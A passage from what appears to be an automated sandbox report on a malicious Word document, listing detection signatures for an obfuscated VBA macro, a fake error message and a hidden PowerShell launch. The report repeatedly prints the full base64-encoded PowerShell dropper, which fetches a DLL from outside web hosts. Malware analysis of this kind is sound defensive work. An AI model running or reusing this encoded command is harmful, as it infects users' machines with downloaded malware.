gACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: ??\C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219049704.00000000028F5000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb" source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2219264371.0000000002BF7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2219201518.0000000002B90000.00000002.00000001.sdmp
Source: Informacion_29.docInitial sample: OLE summary subject = Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: Informacion_29.docStream path 'Macros/VBA/Jwq9b1lb0hmm7' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Jwq9b1lb0hmm7Name: Jwq9b1lb0hmm7
Document contains an embedded VBA with many randomly named variablesShow sources
Source: Informacion_29.docStream path 'Macros/VBA/Jwq9b1lb0hmm7' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKJump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsA